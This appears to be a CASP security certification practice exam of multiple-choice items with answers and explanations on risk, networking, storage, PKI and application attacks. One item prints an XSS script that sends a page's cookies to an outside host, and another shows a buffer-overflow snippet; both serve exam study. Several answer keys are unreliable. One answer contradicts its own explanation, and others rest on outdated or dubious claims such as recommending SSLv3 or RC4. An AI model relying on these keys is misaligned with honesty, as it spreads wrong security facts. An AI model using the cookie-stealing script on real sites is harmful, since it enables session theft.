CASP Practice Exam 1
During user acceptance testing of an application, it is discovered that when entering order amounts, in at least three cases the application crashes when the user clicks Submit. In all three cases, it cannot be determined exactly what type of mistyping has caused the crash. Which tool could be used to reproduce this crash? A. online fuzzer B. black box C. protocol analyzer D. ping sweeper
Answer: A Explanation: Fuzzers are used to introduce errors to an application to determine whether the application handles the errors properly. In this case, a fuzzer could determine which character sequences are causing the crash.
You have been recently hired as the security administrator for your company. You need to ensure that the security policies that you establish have the maximum effect for the company. Which actors are most important to this success? A. all personnel B. upper-level management C. security personnel D. attackers
Answer: A Explanation: In order to have the maximum effect for the company, all personnel are important to the success of any security policies that you establish.
Company C is selling part of its business to Company D. The assets include a small plant, Company C's network, and 50 employees. In the transition, which of the following actions would pose the most risk to Company C? A. a temporary joining of the Company C and Company D networks B. a temporary joining of the plant network and the Company D network C. a temporary assignment of three technicians from Company C to the Company D network to help in the transition D. a temporary assignment of three technicians from the Company D network to the Company C network to help in the transition
Answer: A Explanation: Joining Company C's network to Company D's network, even temporarily, presents a big security risk.
Recently issues have been identified on the wireless LAN. Which of the following issues could be addressed with 802.11e? A. performance issues with VoIP and video streaming B. identification of rogue access points C. problems with roaming between access points D. elimination of interference
Answer: A Explanation: 802.11e is a standard that describes a method of providing QoS for wireless traffic. This could be used to give priority to the latency-sensitive traffic.
As part of your organization's comprehensive security plan, all departments must perform full data backups on a weekly basis. Which type of control does this describe? A. technical control B. administrative control C. physical control D. detective control
Answer: A Explanation: Data backups are technical controls.
If your organization performs a full backup every Sunday and a differential backup Monday through Saturday, what is the largest number of backup files that will have to be restored? A. 1 B. 2 C. 3 D. 7
Answer: B Explanation: If your organization performs a full backup every Sunday and a differential backup Monday through Saturday, the largest number of backup files that will have to be restored is two. In a differential scheme, only the full backup and the most recent differential backup must be restored.
After attending a security conference, your manager wants you to perform research on types of attacks in which the attacker reuses an attack that has worked on other organizations. It is very important to your manager that you learn as much about this type of attack as possible. What is this type of attack called? A. birthday attack B. target of opportunity C. zero-day attack D. drive-by attack
Answer: B Explanation: This type of attack is referred to as a target of opportunity attack. Once an attack has been successful on a particular device, attackers often try to locate other targets that use the same device to see if the same attack will be successful again.
Your company has recently purchased a new web server that will be customer facing. Currently no security controls are deployed on the web server. During risk analysis, it was determined that the cost of any web server compromise would be $250,000. You deploy a security solution for $25,000 that will provide a 90% reduction in risk. What is the ROI for this solution? A. $225,000 B. $200,000 C. $25,000 D. $22,250
Answer: B Explanation: To calculate return on investment, you must first calculate the percentage of the asset value that is covered by the solution: $250,000 × .9 = $225,000 ROI = Modified asset value - Control cost = $225,000 - $25,000 = $200,000
During a forensic investigation, a systems administrator indicates that she is in possession of a copy backup of the compromised system. This backup was taken a few hours before an attack disabled the system. You must decide whether to use the copy backup to restore the system. What is this type of backup? A. a backup that backs up all the files, much like a full backup, but does not reset the file's archive bit B. a backup that uses a file's time stamp to determine whether it needs to be archived C. a backup in which all files that have been changed since the last full backup will be backed up, and the archive bit for each file will not be cleared D. a backup in which all files that have been changed since the last full or incremental backup will be backed up, and the archive bit for each file will be cleared
Answer: A Explanation: A copy backup backs up all the files, much like a full backup, but does not reset the file's archive bit.
As a storage administrator, you are implementing a storage solution for a customer. He has suggested that you implement a solution that uses iSCSI to access the data. Which of the following is a security issue you need to discuss with him? A. it use of block-level data B. its use of file-level data C. its inability to use CHAP authentication D. its inability to use IPsec
Answer: A Explanation: Because iSCSI accesses blocks of data rather than files, any security breaches expose more information than would be the case with file-level access, as in NAS.
Your organization is currently working to ensure that the enterprise follows recognized standards. Which of the following statements is TRUE regarding using standards in your organization? A. De jure standards should take precedence over all other standards, including de facto standards. B. De facto standards should take precedence over all other standards, including de jure standards. C. Competing standards should be ignored. D. The organization should adhere only to standards managed by a standards organization.
Answer: A Explanation: De jure standards should take precedence over all other standards, including de facto standards.
The SDLC team is creating a new process to improve the quality of in-house applications. The team lead has identified a product called a fuzzer that he wants to use. What is a fuzzer used for? A. to verify that an application is properly handling user error exceptions B. to verify the performance of the application C. to perform a vulnerability assessment of the application D. to perform a penetration test of the application
Answer: A Explanation: Fuzzers are used to introduce errors to an application to determine whether the application handles the errors properly.
As a SAN administrator, you are implementing a storage solution for a customer. A server will remotely mount physical disks on the shared SAN and then write a large number of small files to disk before a Java program processes the files. Which consideration is most important to ensure that the files can be processed successfully by the Java program? A. Ensure that the server can write the files to the disk as fast as the Java program can process them. B. Ensure that the Java program has the latest updates. C. Ensure that the server has multiple NICs. D. Ensure that the server utilizes processor affinity.
Answer: A Explanation: If the Java program is reading the data faster than the file system is writing the data, there may be an issue with processing the data. It will appear as incompletely written to the disk.
You and the network access team are discussing how to control access to the network. While one team member suggests using a captive SSL portal, others are in favor of using 802.1x with a RADIUS server. Why would the latter suggestion be better? A. A captive SSL portal may be exploitable with a simple packet sniffer. B. The portal cannot display an AUP. C. SSL cannot encrypt the transmissions. D. 802.1x can be applied to open Ethernet jacks.
Answer: A Explanation: In some implementations of an SSL captive portal, once the device is granted access, the MAC address or IP address of the device is allowed to bypass the captive portal. By using a sniffer, a hacker could learn the MAC or IP address of an authenticated device, spoof the address, and gain entry.
Your company completes a risk analysis. After the analysis, management requests that you deploy security controls that will mitigate any of the identified risks. Management indicates that there is an expected level of residual risk that they expect. What is residual risk? A. risk that is left over after safeguards have been implemented B. terminating the activity that causes a risk or choosing an alternative that is not as risky C. passing the risk on to a third party D. defining the acceptable risk level the organization can tolerate and reducing the risk to that level
Answer: A Explanation: Residual risk is risk that is left over after safeguards have been implemented.
After a breach in your organization resulted in the public release of top-secret information, the company implemented a MAC that enforces no read-up, a MAC that enforces no write-down, and a DAC that uses an access matrix. What is the property that has been implemented with the no-read-up MAC? A. simple security property B. star property C. discretionary security property D. strong star property
Answer: A Explanation: The Bell-LaPadula model defines two mandatory access control (MAC) rules and one discretionary access control (DAC) rule with three security properties. The following properties have been implemented in this scenario: No-read-up MAC is a simple security property. No-write-down MAC is a star property. DAC using an access control matrix is a discretionary security property.
Companies A and B are merging, with the security administrator for Company A becoming head of IT. In which of the following scenarios would the first step be to perform a vulnerability assessment of Company B's network? A. The two networks must be joined. B. An application used by Company B must be integrated by Company A. C. The two networks have overlapping IP address ranges. D. An attack is under way in Company A's network.
Answer: A Explanation: The first step should be to assess any vulnerabilities that exist in company B's network so that when they are joined, the issue will not be transferred to Company A's network.
After several support calls complaining about network issues, you capture the following series of packets: 06:02:50.626330 arp reply 192.168.99.35 is-at 0:80:c8:f8:4a:51 (0:80:c8:f8:4a:51) 06:02:51.622727 arp reply 192.168.99.35 is-at 0:80:c8:f8:4a:51 (0:80:c8:f8:4a:51) 06:02:52.620954 arp reply 192.168.99.35 is-at 0:80:c8:f8:4a:51 (0:80:c8:f8:4a:51) What type of attack is occurring? A. man-in-the-middle B. VLAN hopping C. SYN flood D. smurf
Answer: A Explanation: The packets displayed are gratuitous ARP replies. They are created by the hacker and are replies to a question that never came from the devices in the network. This attack causes the devices to update their ARP cache with the mappings included in the packet. This creates incorrect mappings in the devices' ARP caches, and when done correctly, it can cause the hacker to receive all traffic between two machines—or make him the man in the middle in a man-in-the-middle attack.
Your company recently experienced a breach of a server that resulted in intellectual property loss. Now the security team is looking for additional attack surfaces in the network that could lead to another such loss. Which of the following issues presents the greatest possibility of this type of loss again? A. company laptops accessing social media sites through the guest wireless network B. users accessing shopping sites on personal devices through the main network C. users accessing the network through a VPN connection D. guest users accessing the Internet on the guest wireless network
Answer: A Explanation: When company laptops access social media sites from any network, there are two ways information could be lost. First, malware from a site could infect the system, allowing access later through a back door. Second, users sometimes inadvertently reveal information on social media sites.
The company you work for has implemented the following security controls: All workstations have the latest patches and antivirus. All sensitive data is encrypted in transit. Dual-factor user authentication is used. A firewall at the edge of the network is implemented. What is missing from this security posture? A. no local encryption B. weak user authentication C. insufficient edge control D. exposure to viruses
Answer: A Explanation: While transport encryption has been enabled, the sensitive data should be encrypted on the hard drives as well.
An employee has been accused of carrying out a crime from his corporate desktop PC. You have been asked to capture the current state of the PC, including all of its contents, according to proper forensic rules. When you locate the PC, it is turned off. What is the order of capture for this system? A. hard drive, BIOS settings, external media B. RAM, hard drive, external media C. RAM, external media, hard drive D. hard drive, external media, BIOS settings
Answer: A Explanation: You should capture the forensic data in the following order: hard drive, BIOS settings, and external media.
Your company is negotiating with a new service provider for its Internet services. You have been asked to draft a service-level agreement (SLA) that stipulates the required levels of service for this company. The SLA must provide the appropriate levels of service that will ensure that your company's departmental SLAs are met. What should you use to develop the draft SLA? A. OLA B. NDA C. MOU D. ISA
Answer: A Explanation: You should use the operating-level agreement (OLA) to develop the draft SLA. You need to ensure that your company's departmental SLAs are met. These are defined in an OLA.
Several of your organization's users have requested permission to install certificates from a third party. Company policy states that before users can install these certificates, you must verify that the certificates are still valid. You need to check for revocation. What could you check to verify this information? (Choose all that apply.) A. CRL B. OCSP C. DNSSEC D. DRM
Answer: A, B Explanation: You can use either a certificate revocation list (CRL) or Online Certificate Status Protocol (OCSP) to check for certificate revocation, depending on which type of PKI is deployed.
As the security administrator for your organization, you are responsible for recognizing situations that will cause organizational security issues. Which of the following should be considered? (Choose all that apply.) A. company mergers B. internal restructure C. government regulations D. new industry threats identified
Answer: A, B, C, D Explanation: All of the situations given will cause organizational security issues.
Recently, management has attended a security awareness workshop where advanced persistent threats (APTs) were discussed in great detail. After returning from the training, management has requested that you take any precautions necessary to protect against APTs. Which of the following are characteristics of these threats? (Choose all that apply.) A. APTs maintain a way to access an attacked device over and over again. B. APTs are carried out from multiple locations on a single device. C. The goal of APTs is to interrupt network operations. D. APTs quietly obtain information about an attacked device.
Answer: A, D Explanation: APTs maintain a way to access an attacked device over and over again, and they quietly obtain information about the attacked device.
An organization that utilizes single sign-on has a primary domain and three secondary domains. Which of the following statements will be true of this scenario? (Choose all that apply.) A. The secondary domains need to trust the primary domain to protect the authentication credentials used to verify the end-user identity to the secondary domains for authorized use. B. The primary domain needs to trust the secondary domains to protect the authentication credentials used to verify the end-user identity to the primary domain for authorized use. C. The secondary domains will assert the identity and authentication credentials to the primary domain on behalf of the user. D. The primary domain will assert the identity and authentication credentials to the secondary domains on behalf of the user.
Answer: A, D Explanation: The secondary domains have to trust the primary domain to correctly assert the identity and authentication credentials of the end user and protect the authentication credentials used to verify the end-user identity to the secondary domain from unauthorized use. The authentication credentials have to be protected when transferred between the primary and secondary domains against threats arising from interception or eavesdropping leading to possible masquerade attacks.
The storage team is discussing the implementation of shared storage to support a business-critical, high-volume database application. Which of the following characteristics makes a NAS unsuitable for this application? A. its use of block-level data transfers B. its use of file-level data transfers C. its excessive cost compared to a SAN D. its inability to utilize NFS
Answer: B Explanation: A NAS uses file-level transfers of data, which is not appropriate for this type of application. This application would benefit from the use of block-level transfers, which is more efficient and is what would be used with a SAN.
If you implement FCoE in your storage network, which of the following security issues should concern you? A. a breach of the Fibre Channel network B. a breach of the Ethernet network C. the use of iSCSI commands D. the inability to use encryption
Answer: B Explanation: Because FCoE encapsulates Fibre Channel frames within Ethernet frames, a breach of the Ethernet network would be a concern.
Your organization recently deployed a standard operating system image to all desktop systems and is now scanning the computers weekly against a security baseline. Which of the following cannot be learned by scanning against the baseline? A. whether security settings have been changed B. whether user data has been deleted C. whether security policies have been disabled D. whether antimalware software has been removed
Answer: B Explanation: Because the data was not present in the image, it cannot be detected as missing when the scan is run.
Your organization has recently implemented several new security policies in response to a recent risk analysis. One of the new policies states that controls must be configured to protect files from unauthorized or accidental deletion. Which aspect of security does this new policy address? A. confidentiality B. integrity C. availability D. authorization
Answer: B Explanation: Configuring controls that will protect files from unauthorized or accidental deletion addresses data integrity.
Your company, a healthcare provider, is considering outsourcing its messaging system to a managed service provider. The proposal presented makes no mention of a DLP functionality. If this is not present, which of the following are you in danger of experiencing? A. poor messaging performance B. loss of PII C. open email relay D. unauthenticated sessions
Answer: B Explanation: Data loss prevention (DLP) systems are used to control what users can email and print (among other things). When DLP is not in place, it is possible for personally identifiable information (PII) to be mistakenly emailed or printed and released.
As part of the process of conducting a business impact analysis (BIA), you document the device name, operating system or platform version, hardware requirements, and device interrelationships of all devices. Which step of the BIA are you performing? A. Identify critical processes and resources. B. Identify resource requirements. C. Identify outage impacts, and estimate downtime. D. Identify recovery priorities.
Answer: B Explanation: During the identify resource requirements step, you document the device names, operating systems or platform versions, hardware requirements, and device interrelationships of all devices.
The web development team has a new application that needs to be assessed from a security standpoint. When the third-party testing team presents its test cases, it mentions that an HTTP interceptor is one of the tools it will utilize. Which of the following issues would this be most suitable to test for? A. open ports B. input validation of a form C. access control D. performance under stress
Answer: B Explanation: HTTP interceptors are tools that can be used to introduce invalid input to see if the application performs proper input validation.
After a recent meeting, your team was provided with the following list of requirements for a new network location: Confidentiality, integrity, and availability (CIA) are all of equal importance. Average availability must be at least 6 nines (99.9999%). All devices must support collaboration with every other user device. All devices must be VoIP and teleconference ready. To meet these requirements your team takes the following actions: Enforces security policies on mobile/remote devices Makes standard images and checks device hardware configurations Backs up all storage devices Considering the actions your team has taken, which requirement is MOST likely to not be met? A. Confidentiality, integrity, and availability (CIA) are all of equal importance. B. Average availability must be at least 6 nines (99.9999%). C. All devices must support collaboration with every other user device. D. All devices must be VoIP and teleconference ready.
Answer: B Explanation: It will be difficult to meet 6 nines' availability without multiple layers of redundancy.
Your company is merging with another company that operates in several other countries. Which of the following security issues is MOST likely to be affected by the differences in legal or regulatory requirements? A. software coding practices B. expectation of privacy policy C. network access controls D. disaster recovery procedures
Answer: B Explanation: Legal or regulatory requirements in various countries may restrict the type of employee monitoring that can be done in a country.
You are moving to a new location and have been asked to assess the security additions required in the new location. Which of the following concerns could be addressed with a mantrap? A. need to log all visitors B. prevention of tailgating C. dim lighting in the parking lot D. contractors connecting to open ports
Answer: B Explanation: Mantraps afford the ability to allow one user or visitor to enter at a time, preventing tailgating.
Management at your company has become increasingly concerned about botnet attacks. After researching the issue, you decide to monitor certain conditions to help detect whether a botnet attack is under way. Which trend is the best indicator of this type of attack? A. connection attempts increase on Internet-facing web servers B. TCP and UDP traffic increase during off-peak hours C. port scanning attempts increase over a 24-hour period D. unsuccessful logins increase during peak hours
Answer: B Explanation: Of the possibilities listed, the best indicator of a botnet attack is an increase in TCP and UDP traffic during off-peak hours.
What is the name of the process of automatically removing sensitive material from outgoing emails? A. scrapping B. sanitizing C. filtering D. profiling
Answer: B Explanation: Removing data from outgoing email is called sanitizing.
Your boss just returned for a security conference and is concerned that users are not creating good passwords. He wants you to run password auditing software against the password file. What would be the biggest benefit of loading the file onto a four-server cluster and running the scan there? A. better scan results B. faster results C. less network traffic created D. less chance of malware infection
Answer: B Explanation: Running the scan on the four-server cluster would allow the additional processing power to be used to finish the scan much faster.
Your company must design the security requirements for several new systems. Which personnel should develop these? A. management B. security personnel C. programmers D. database administrator
Answer: B Explanation: Security personnel should develop a company's security requirements.
You have decided to deploy SPML to facilitate the exchange of provisioning information among applications. On what language is this based? A. HTML B. XML C. HTTP D. SFTP
Answer: B Explanation: Service Provisioning Markup Language (SPML) is an XML-based framework for exchanging user, resource, and service provisioning information between cooperating organizations.
The help desk is reporting that because of multiple passwords for services, users are overutilizing the help desk for password resets. Which of the following features would help solve this problem? A. NAT B. SSO C. SSL D. STP
Answer: B Explanation: Single sign-on (SSO) allows the user to authenticate once to access all services. This gives each person a single password to remember.
You have been given both a physical network diagram and a logical network diagram for your company's enterprise. Which of the following information is shown only on the physical network diagram? A. device names B. cabling used C. IP addresses D. device roles
Answer: B Explanation: The cabling used is shown only on the physical network diagram.
The following code is an example of what type of attack? #include char *code = "AAAABBBBCCCCDDD"; //including the character '\0' size = 16 bytes void main() {char buf[8]; strcpy(buf, code); } A. SQL injection B. buffer overflow C. cross-site scripting D. integer overflow
Answer: B Explanation: The code is an example of a buffer overflow. In this example, 16 characters are being sent to a buffer that is only 8 bytes.
You work for a cable company that utilizes VLANs in its internal network and provides customers with connections between locations. If the company were to offer MPLS, what additional service would the company be able to offer customers that it currently cannot offer? A. metro Ethernet B. establishment of VLANs between sites C. cable TV and Internet service D. transport encryption
Answer: B Explanation: The implementation of MPLS would allow the cable company to keep VLANs of customers separate from its own internal VLANs.
Your company recently had a third party review all internal procedures. As a result of this review, the third party made several recommendations for procedural changes. One of the recommendations is that critical financial transactions should be split between two independent parties. Of which principle is this an example? A. job rotation B. separation of duties C. least privilege D. mandatory vacation
Answer: B Explanation: This is an example of separation of duties, which occurs when critical tasks are split between independent parties to prevent fraud.
You would like to reduce the risk associated with the administrative access you need to give several IT employees. You would like to enforce separation of duties, but you also want the employees to be able to perform the functions given one another in the case where an employee is absent. To support each employee's primary role, you implement role-based access control. What will be the safest way to allow the employees to step in for one another when necessary? A. Include those permissions in the primary role. B. Provide those permissions manually when required. C. Assign all permissions to a single role and assign the role to all IT employees. D. Create multiple accounts for each user and have them use one account only when required.
Answer: B Explanation: To reduce risk the most, you should give the employees the additional permission on an ad hoc basis, as needed.
Which of the following attacks could be detected through SIP and SRTP traffic analysis? A. smurf B. SPIT C. SYN flood D. teardrop
Answer: B Explanation: VoIP spam, or spam over IP telephony (SPIT), is characterized by bulk unsolicited calls using VoIP, SIP, and SRTP traffic analysis. The underlying technology driving this threat is Session Initiation Protocol (SIP). Secure Real-time Transport Protocol (SRTP) is a secure version of Real Time Protocol (RTP) that is also used in VoIP traffic. Through SIP and SRTP traffic analysis, these attacks can be detected.
You need to implement a technology that can prevent IP spoofing. Which of the following would do this? A. DNSSEC B. unicast reverse path forwarding C. private VLANs D. port security
Answer: B Explanation: When enabled, unicast reverse path forwarding allows a router to verify the reachability of the source address in packets being forwarded. If the router cannot find a path back to the IP address in its routing table using the interface on which it arrived, it knows spoofing is occurring, and it drops the packet.
Remote users connect to a VPN concentrator for video conferences. Which of the following configurations, if enabled, would reduce the performance of the conference for the remote users? A. single sign-on B. split tunneling C. routing protocols D. STP
Answer: B Explanation: While split tunneling allows users to access the corporate LAN and the Internet at the same time, it also reduces the bandwidth available to the conference and lowers performance.
Your organization needs to retain a legacy application for the inventory department. Next year, a new application will be purchased, and all the current data will be exported to the new application at that time. For the time being, you have been asked to retain the legacy application. The computer on which the legacy application resides can no longer be supported and must be removed from the enterprise. You have been asked to implement a solution that allows the legacy application to remain in use. What should you do? A. Deploy the legacy application on its own VLAN. B. Deploy the legacy application on a virtual machine. C. Deploy the legacy application on the DMZ. D. Deploy the legacy application on a public cloud.
Answer: B Explanation: You should deploy the legacy application on a virtual machine. This ensures that the legacy application is still supported while ensuring that the computer it is on can be removed from the enterprise.
You have documented several possible solutions to a security issue that occurred last week. You need to test all the possible solutions to see the effect that each has and to determine which to deploy. Which is the most important guideline you should follow? A. Maintain adequate bandwidth while testing each solution. B. Test each solution under the same conditions. C. Patch all lab computers prior to testing each solution. D. Determine the acceptable false-positive maximum.
Answer: B Explanation: You should test each solution under the same conditions. This ensures that each solution will be assessed fairly in comparison to the others.
You have recently been hired to manage your company's security team. You must ensure that an effective security team is built. Which policies should you keep in mind for this? (Choose all that apply.) A. The team leadership must be obtained from within the security industry. B. Team members must include individuals from across the entire spectrum of security. C. Team goals must be clearly defined and understood. D. Team actions must have clearly defined rules.
Answer: B, C, D Explanation: You should keep in mind the following policies: Team members must include individuals from across the entire spectrum of security. Team goals must be clearly defined and understood. Team actions must have clearly defined rules.
You are your company's security analyst. Management has allocated funds for you to attend one conference this year. You have been asked to focus on a conference that will most improve your security knowledge. The conference needs to include training on the latest hacking techniques. Which of the following conferences should be among those that you research? (Choose all that apply.) A. ISSA B. DEFCON C. RSA Conference D. Black Hat Conference
Answer: B, C, D Explanation: You should research DEFCON, RSA Conference, and Black Hat Conference and then select the one that best fits your needs as a security analyst.
You need to protect your organization's confidential or private data. The method you choose must isolate this data from all other types of data. Which of the following are valid methods of protecting confidential or private data? (Choose all that apply.) A. Place the data on a flash drive. B. Place the devices that store this information on their own VLAN. C. Create a separate folder on a public server to store this type of data. D. Place this type of data on separate servers.
Answer: B, D Explanation: You could place the devices that store this information on their own VLAN or place this type of data on separate servers.
Your organization has decided to purchase a new security device for your enterprise. Unfortunately, you have some very unique needs that must be documented. You are unsure of how some of these needs will be met. You decide to create a document that seeks information to determine the device's requirements. You will send this document to all vendors that may have products to offer. Which document are you creating? A. RFP B. RFC C. RFI D. RFQ
Answer: C Explanation: A request for information (RFI) is a document that solicits information on a product from vendors.
Company E has a contract with a smaller company. The smaller company provides security at a high-security location. Company E discovers that the smaller company has subcontracted some of the functions. What is the minimum step that Company E must take in reaction to this situation? A. Do nothing. It is shielded from liability. B. Execute a new contract that includes the subcontractor. C. Require the security contractor to execute a service agreement with the subcontractor. D. Fire the security consulting company.
Answer: C Explanation: At a minimum, the company should require and examine the service contract between the contractor and subcontractor to ensure that the company is insulated from liability issues and service issues.
Credential Security Support Provider (CredSSP) provides SSO and network-level authentication to which of the following services? A. SharePoint services B. Project server services C. Remote Desktop Services D. SQL
Answer: C Explanation: Credential Security Support Provider (CredSSP), introduced in Windows Vista and available on Windows XP SP3 and later, provides SSO and network-level authentication for Remote Desktop Services.
As part of the process of conducting a business impact analysis (BIA), you perform the MTD, MTTR, and MTBF calculations. Which step of the BIA are you performing? A. Identify critical processes and resources. B. Identify resource requirements. C. Identify outage impacts, and estimate downtime. D. Identify recovery priorities.
Answer: C Explanation: During the identify outage impacts and estimate downtime step, you perform the MTD, MTTR, and MTBF calculations.
You are the security analyst for your company. In recent months, the security demands of the company have greatly increased. Management has adopted a new policy which states that security is an ever-changing field requiring research to remain abreast of the latest threats and security measures. As part of this policy, you have been tasked with regularly performing research on security issues. What is the most important topic to research on a regular basis? A. new security systems B. best practices C. new technologies D. new threats to existing technologies
Answer: C Explanation: It is most important to research new technologies on a regular basis. New technologies will not have any identified best practices and security procedures. By researching new technologies, you will ensure that you better understand the security issues related to these technologies.
When a user authenticates to your network, a web access control infrastructure performs authentication and passes attributes in an HTTP header to multiple applications. What is this process called? A. federated authentication B. delegated authentication C. single sign-on D. portal authentication
Answer: C Explanation: Single sign-on allows a user to authenticate once to access all services. This gives each person a single password to remember.
As your company's security practitioner, you are responsible for host, storage, network, and application integration into the secure enterprise architecture. Your company's security policy states that you must ensure that the CIA of data is ensured across its entire life cycle. Which principle will provide this functionality? A. least privilege B. separation of duties C. defense in depth D. social engineering
Answer: C Explanation: The principle of defense in depth ensures that the CIA of data is ensured across its entire life cycle.
The following script is designed to attempt what type of attack? <SCRIPT> document.location='http://site.comptia/cgi- bin/script.cgi?'+document.cookie </SCRIPT> A. SQL injection B. buffer overflow C. XSS D. integer overflow
Answer: C Explanation: The script is designed to attempt a cross-site scripting (XSS) attack.
In the following raw HTTP request, which part is problematic? GET /disp_reports.php?SectionEntered=57&GroupEntered=- 1&report_type=alerts&to_date=01- 01-0101&Run= Run&UserEntered=dsmith&SessionID=5f04189bc&from_date=31-10- 2010&TypesEntered=1 HTTP/1.1 Host: test.example.net Accept: */* Accept-Language: en Connection: close Cookie: java14=1; java15=1; java16=1; js=1292192278001; A. Host: test.example.net B. Connection: close C. Run&UserEntered=dsmith&SessionID=5f04189 D. Accept: */*
Answer: C Explanation: The section Run&UserEntered=dsmith&SessionID=5f04189 contains the session ID of an authenticated user, specifically the user is dsmith and the session ID is 5f04189.
Your organization needs to deploy its network so that all servers are isolated from the rest of the internal resources. In addition, Internet-facing systems must be isolated on a demilitarized zone (DMZ) from the internal network. How many firewalls should you deploy? A. one B. two C. three D. four
Answer: C Explanation: You should deploy three firewalls: one between the Internet and the DMZ, one between the DMZ and the internal network, and one between the internal network and the server network.
Your company has an intrusion detection system (IDS) and firewall deployed on the perimeter of the network to detect attacks against internal resources. Yesterday, the IDS alerted you that SSL sessions are under attack, using an older exploit against SSLv2. Your organization's web server must use encryption for all financial transactions. You need to prevent such an attack from being successful in the future. What should you do? A. Block SSLv2 on the firewall. B. Block SSLv2 on the web server. C. Disable SSLv2 and enable SSLv3 on the web server. D. Update the web server with the latest patches and updates.
Answer: C Explanation: You should disable SSLv2 and enable SSLv3 on the web server. This will prevent the use of SSLv2, which is the problem.
A new security policy adopted by your organization states that you must monitor for attacks that compromise user accounts. Which of the following activities should you monitor? A. sensitive file access in a 12-hour period B. average throughput of the network perimeter C. failed logins in a 24-hour period D. port scans in a 24-hour period
Answer: C Explanation: You should monitor failed logins in a 24-hour period. Brute-force attacks attempt to access the same user account using different passwords, resulting in repeated failed logins.
Your company has recently decided to merge with another company. Each company has its own Internet PKI that deploys certificates to users within that network. You have been asked to deploy a solution that allows each company to trust the other's certificates. What should you do? A. Issue a policy certificate accepting both trust paths. B. Deploy a new PKI for all users and import the current user certificates to the new PKI. C. Use a cross-certification certificate. D. Add the root certificate to both of the root certification authorities (CAs).
Answer: C Explanation: You should use a cross-certification certificate to ensure that each company trusts the other company's certificates.
Your company has recently adopted a formal change management process. All changes must be approved by the change control board. Which of the following statements regarding this process are true? (Choose all that apply.) A. Proper change management reduces operational difficulty. B. Proper change management results in reduced implementation costs. C. Proper change management ensures that there are minimum service interruptions. D. Proper change management reduces the number of rollbacks needed when updates fail.
Answer: C, D Explanation: The following statements regarding the change management process are true: Proper change management ensures that there are minimum service interruptions. Proper change management reduces the number of rollbacks needed when updates fail.
Input validation is a technique used to prevent which of the following application attacks? A. memory leaks B. privilege escalation C. improper error handling D. SQL injection
Answer: D Explanation: A SQL injection attack inserts, or "injects," a SQL query as the input data from the client to the application. To prevent these types of attacks, use proper input validation.
You install an SSL VPN that connects to your data center and have users connect to a standard virtual workstation image. Which of the following requirements have you NOT met? A. All data is encrypted in transport. B. Users will have the same data sets set at the same version. C. All data must remain in the data center. D. Users must not access the system between 12 a.m. and 1 a.m.
Answer: D Explanation: All requirements are met with the exception of preventing access between 12 a.m. and 1 a.m. To accomplish this, you must set workstation time of day restrictions.
The research department for your company needs to carry out a web conference with a third party. The manager of the research department has requested that you ensure that the web conference is encrypted because of the sensitive nature of the topic that will be discussed. Which of the following should you deploy? A. SSL B. SET C. IPsec D. RC4
Answer: D Explanation: RC4 is a stream-based cipher and could be used to encrypt web conference traffic.
Your company completes a risk analysis. After the analysis, management requests that you deploy security controls that will mitigate any of the identified risks. What is risk mitigation? A. risk that is left over after safeguards have been implemented B. terminating the activity that causes a risk or choosing an alternative that is not as risky C. passing the risk on to a third party D. defining the acceptable risk level the organization can tolerate and reducing the risk to that level
Answer: D Explanation: Risk mitigation is defining the acceptable risk level the organization can tolerate and reducing the risk to that level.
Your company has a single, centralized web-based retail sales system. Orders come in 12 hours per day, 364 days per year. Sales average $500,000 per day. Attacks against the retail sales system occur on a daily basis. For the retail sales system, there is a 1% chance of a hacker bringing the system down. The mean time to restore the system is 6 hours. What is the ALE for this system? A. $912,500 B. $250,000 C. $500,000 D. $910,000
Answer: D Explanation: The annualized loss expectancy (ALE) for the system is $910,000. The asset value (AV) is $500,000. The exposure factor (EF) is 0.5 (6 hours/12 hours). Single loss expectancy (SLE) = AV × EF = $500,000 × 0.5 = $250,000 Annualized rate of occurrence (ARO) = 0.01 × 364 = 3.64 Annualized loss expectancy (ALE) = SLE × ARO = $250,000 × 3.64 = $910,000
Your company's development team is working on a new application that will be used by the research and development department. Because of the critical nature of the data that will be stored in this application, security is extremely important. The development team has created a grid that connects the security requirements, implementation details, and testing details. What grid has been created? A. ACL B. SDLC C. RFID D. SRTM
Answer: D Explanation: The grid that has been created is the security requirements traceability matrix (SRTM).
You have been asked to improve the quality of the code produced by the software development team, so you are creating a secure coding standard document. Which of the following is NOT a topic that should be covered in the document? A. error handling B. input validation C. memory use and reuse D. performance metrics
Answer: D Explanation: Topics covered should include: Error handling Input validation Memory use and reuse Race condition handling Commenting Preventing typical security problems
Your company is going to launch a new version of a banking application. To ensure an appropriate security posture, the team performs penetration tests, using accounts with varying levels of access. Which of the following would be the best additional step to take? A. code review across critical modules B. performance testing C. port scanning in the network for open ports D. review of all patch levels on all servers
Answer: D Explanation: While all options are security related and good ideas, the most pressing need with respect to this application is code review.
Your company has decided to adopt a formal asset disposal policy for all desktop computers. Which of the following policies should be adopted? A. Reset the computer to its factory default. B. Format all hard drives. C. Back up all user data. D. Destroy all hard drives.
Answer: D Explanation: You should destroy all hard drives to ensure that the data on the hard drives cannot be retrieved.
You are the security practitioner for your company. The company has recently adopted a new asset disposal policy in which you are required to render any information stored on magnetic media unrecoverable by forensics methods. Which of the following should you use? A. data clearing B. remanence C. formatting D. data purging
Answer: D Explanation: You should opt for data purging, which uses a method such as degaussing to make the old data unavailable even with laboratory attacks (forensics). Purging renders information unrecoverable against forensics.